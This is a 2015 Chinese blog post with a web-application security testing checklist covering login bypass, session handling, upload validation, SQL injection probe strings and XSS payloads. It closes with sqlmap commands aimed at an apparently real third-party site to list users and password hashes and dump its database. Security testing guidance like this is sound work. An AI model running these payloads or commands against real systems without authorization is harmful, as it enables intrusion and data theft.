Web安全问题
上一篇 /
下一篇 2015-07-30 14:01:47
/ 个人分类:web安全
Web安全问题的层次:
1.网络安全
如防火墙、路由器、网络结构等相关的安全问题
2.系统安全
如Window/Linux/Unix系统本身的漏洞或运行于其上的服务的安全,像Apache/OpenSSL/Weblogic等本身的安全性漏洞
3.应用安全
具体应用程序的安全性漏洞
1 | 不登录系统,直接输入登录后的页面的url是否可以访问 | |
2 | 不登录系统,直接输入下载文件的url是否可以下载 | |
3 | 退出登录后按后退按钮能否访问之前的页面 | |
4 | 是否对session的有效期进行处理 | |
5 | 错误信息中是否含有sql语句、sql错误信息以及web服务器的绝对路径等 | |
6 | 查看网页源代码时能否看到重要信息 | |
7 | 重要信息(如密码,身份证号码,信用卡号等)输入时是否用明文显示 | |
8 | 弱口令使用,密码验证方式中能否使用简单密码。如密码标准为6位以上,字母和数字混合,连续的字母或数字不能超过n位 | |
9 | 手动更改URL中的参数值能否访问没有权限访问的页面 | |
10 | 在浏览器地址栏里输入命令javascript:alert(doucument.cookie)时是否有重要信息 | |
11 | 上传文件是否有大小限制:上传太大的文件是否导致异常错误;上传0K的文件是否会导致异常错误;上传并不存在的文件是否会导致异常错误 | |
12 | 上传是否对上传文件进行格式控制,需要确保可执行文件都被过滤 | |
13 | 关于上传是否成功的判断,上传过程中中断,程序是否有判断上传是否成功 | |
14 | 上传带有特殊符号文件名的文件 | |
15 | 上传与服务器端语言(jsp、asp、php)一样扩展名的文件或exe等可执行文件后,确认在服务器端是否可直接运行 | |
16 | 是否存在SQL注入,传送给服务器的参数(如查询关键字、url中的参数等)中包含特殊字符(','and 1=1 --,' and 1=0 --,'or 1=0 --)时是否可以正常处理 | |
17 | 是否存在XSS攻击,执行新增操作时,在所有的输入框中输入脚本标签(<script>alert("xss")</script>)后能否保存,保存成功后页面刷新是否有弹窗;输入框中输入(<script>alert(document.cookie);</script>),能获取到当前登录用户的cookie 例如: 输入<html”>”gfhd</html>,看是否出错 输入<input type=”text” name=”user” />,看是否出现文本框 输入<script type=”text/javascript”>alert(“提示”)</script>看是否出现提示 一、 Sqlmap使用1.演示例子:http://www.konzern.com.cn/about/index.php?id=1 2.Python sqlmap.py -u “http://www.konzern.com.cn/about/index.php?id=1” -a 3.Python sqlmap.py -u “http://www.konzern.com.cn/about/index.php?id=1” --current-user #当前数据库用户 4.Python sqlmap.py -u “http://www.konzern.com.cn/about/index.php?id=1” --current-db #当前数据库名称 5.Python sqlmap.py -u “http://www.konzern.com.cn/about/index.php?id=1” --users#列数据库用户 6.Python sqlmap.py -u “http://www.konzern.com.cn/about/index.php?id=1” --dbs #列数据库 7.Python sqlmap.py -u “http://www.konzern.com.cn/about/index.php?id=1” --passwords #数据库用户密码 8.Python sqlmap.py -u “http://www.konzern.com.cn/about/index.php?id=1” --tables #列出所有表 9.Python sqlmap.py -u “http://www.konzern.com.cn/about/index.php?id=1” --dump #dump下整个库 |
|
收藏
举报
TAG: